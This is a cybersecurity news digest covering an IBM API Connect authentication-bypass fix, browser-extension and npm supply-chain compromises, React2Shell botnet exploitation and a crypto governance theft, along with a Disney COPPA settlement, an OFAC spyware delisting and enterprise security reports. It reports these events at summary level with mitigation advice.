Critical IBM Fix, Extension Supply-Chain Hits, and Active Exploits

Organizations closed the year with a mix of urgent fixes and hard lessons. IBM urged immediate remediation for a critical authentication bypass in API Connect, detailed by The Hacker News, while defenders also contended with supply-chain tampering in browser extensions and active exploitation of web frameworks. Financial losses from compromised crypto projects and fresh regulatory steps rounded out the day’s developments.

Critical fix for IBM API Connect

IBM disclosed a high-severity flaw in API Connect (CVE-2025-13915, CVSS 9.8) that enables remote authentication bypass across versions 10.0.8.0 through 10.0.8.5 and 10.0.11.0, according to The Hacker News. Interim fixes (ibm-apiconnect--ifix.13195.tar.gz) are available via Fix Central, with guidance to apply them through change management, review logs and authentication events, and rotate credentials where applicable. For environments that cannot patch immediately, IBM advises disabling self-service sign-up on the Developer Portal as a temporary risk reduction. The bulletin notes no evidence of in-the-wild exploitation so far; rapid remediation is still emphasized given the potential exposure of management functions and sensitive API traffic. Why it matters: authentication bypass on a central gateway can cascade into unauthorized access across downstream services.

Supply chains hit extensions and registries

Trust Wallet attributed its Chrome extension compromise to a second Shai‑Hulud supply-chain wave after leaked GitHub secrets exposed a Chrome Web Store API key, enabling attackers to push a malicious update (v2.68) that exfiltrated wallet mnemonics, per The Hacker News. Approximately $8.5 million moved from 2,520 addresses into at least 17 attacker-controlled wallets; users were urged to install version 2.69, and the company opened a case-by-case reimbursement process and tightened release controls. Separately, Koi Security linked the ShadyPanda and GhostPoster campaigns to a broader DarkSpectre operation affecting an estimated 8.8 million users over seven years, with add-ons impersonating conferencing tools to harvest meeting data across platforms like WebEx, Google Meet, Teams, and Zoom. The investigation, summarized by The Hacker News, describes staged trust-building, delayed activation, and real-time exfiltration via WebSockets. Why it matters: trusted plugin channels and extension updates can convert routine software delivery into high-impact data theft at scale.

Researchers also reported a modified strain of the Shai‑Hulud malware tested on the npm package “@vietmoney/react-big-calendar,” with re-obfuscation, new file names (bun_installer.js, environment_source.js), updated exfiltration filenames, and more robust publishing logic, according to The Hacker News. The package saw limited downloads and no major infections reported by Aikido. Analysts noted the actor likely had access to the original source, and highlighted a separate typosquatted Maven package impersonating Jackson that delivered an obfuscated, multi-stage payload. Why it matters: even low-volume tests on developer registries can preface broader supply-chain worms that leverage stolen credentials to poison high-download projects.

Active exploitation and crypto thefts

Researchers tracked the RondoDox botnet exploiting the unauthenticated React2Shell RCE (CVE-2025-55182) against Next.js servers, with CloudSEK observing scans from December 8 and deployments from December 11 and Shadowserver counting more than 94,000 exposed assets, as reported by BleepingComputer. Payloads include a coinminer, a loader that removes competing malware and enforces persistence via crontab, and a Mirai-like binary; prior RondoDox activity targeted other critical flaws, and state-linked operators have also used React2Shell to deliver malware. Analysts recommend auditing and patching Server Actions, isolating IoT on separate VLANs, and monitoring processes and persistence indicators. Meanwhile, Unleash Protocol suffered a governance compromise when an external address gained sufficient multisig signing power to upgrade contracts and siphon assets, leading to an estimated $3.9 million loss across tokens including USDC and WETH; the team paused operations and urged users to avoid contracts pending confirmation of security, per BleepingComputer. Why it matters: rapid exploitation cycles and concentrated administrative control continue to turn configuration lapses and governance weaknesses into immediate operational and financial impact.

Policy moves and enterprise guardrails

Disney agreed to a $10 million civil penalty to settle claims it violated COPPA by mislabeling child-directed YouTube videos, which allowed the collection of personal data from children under 13 and personalized ads, according to BleepingComputer. Under the order, Disney must alert parents before collecting children’s personal information, ensure accurate “Made for Kids” designations, and prevent unlawful data collection and targeted ads. In a separate move, OFAC removed three individuals associated with the Intellexa Consortium and Predator spyware from its sanctions list without a public rationale, a step that civil-society groups warn may weaken consequences for spyware-linked actors, reported by The Hacker News. Why it matters: enforcement choices and settlement obligations shape how platforms and content owners implement privacy controls and influence the incentives surrounding commercial spyware.

On the enterprise front, Equifax described a security transformation following its 2017 breach, citing nearly $3 billion invested in cloud migration with Google Cloud, refactoring, and elimination of legacy platforms, guided by NIST frameworks and supported by about 300 specialists and incentives tied to security outcomes, detailed by CSO Online. The company reports neutralizing over 15 million threats per day and adapting to AI-enabled attacks with biometric and multi-factor authentication. Complementing this, RSA’s ID IQ Report 2026 shows 90% of organizations encounter problems with passwordless deployments, with security, user experience, and legacy support barriers limiting full coverage; experts recommend securing privileged accounts first, sequencing rollouts by risk, and ensuring phishing-resistant enrollment and recovery, per CSO Online. Why it matters: durable gains come from aligning technology modernization with controls that account for heterogeneous environments and enrollment realities—not from one-step replacements.